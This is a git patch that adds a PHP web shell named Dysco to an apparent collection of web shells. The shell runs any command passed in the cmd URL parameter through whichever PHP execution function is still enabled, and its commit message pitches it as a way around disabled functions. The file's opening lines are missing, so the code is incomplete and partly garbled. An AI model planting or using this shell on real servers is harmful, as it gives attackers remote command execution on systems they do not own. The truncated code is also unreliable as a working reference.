From 697ff095b7347b405ef64860bde481ac52e0d8b6 Mon Sep 17 00:00:00 2001
From: Aan <6284204+aancw@users.noreply.github.com>
Date: Fri, 6 May 2022 01:42:28 +0700
Subject: [PATCH] Add Dysco(Dynamic PHP Shell Command for RCE)
Dysco(Dynamic PHP Shell Command for RCE). This is example PHP Shell with support for dynamic RCE command, it's useful when you are don't know which php function is disabled.
---
Web-Shells/PHP/Dysco.php | 59 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 59 insertions(+)
create mode 100644 Web-Shells/PHP/Dysco.php
diff --git a/Web-Shells/PHP/Dysco.php b/Web-Shells/PHP/Dysco.php
new file mode 100644
index 00000000..dae45f9f
--- /dev/null
+++ b/Web-Shells/PHP/Dysco.php
@@ -0,0 +1,59 @@
+";
+ foreach($f_enabled as $f)
+ {
+ echo $f." ";
+ }
+
+ if($f_enabled !== ""){
+ $f = $f_enabled[0];
+ echo "
\nUsing ". $f. " as shell command\n
";
+
+ if($f == "system" || $f == "passthru"){
+ // disable multiple output for system
+ ob_start();
+ $output = $f($command, $status);
+ ob_clean();
+ }
+ else if($f == "exec"){
+ $f($command, $output, $status);
+ $output = implode("n", $output);
+ }
+ else if($f == "shell_exec"){
+ $output = $f($command);
+ }
+ else{
+ $output = "Command execution not possible. All supported function is disabled.";
+ $status = 1;
+ }
+
+ }
+
+ return array('output' => $output , 'status' => $status);
+}
+
+// for HTTP GET use this.
+
+if(isset($_GET['cmd'])){
+ $o = Dysco($_GET['cmd']);
+ echo $o['output'];
+}
+
+// for debugging in local, use this
+
+//$o = shell_spawn('uname -a');
+//echo $o['output'];
+?>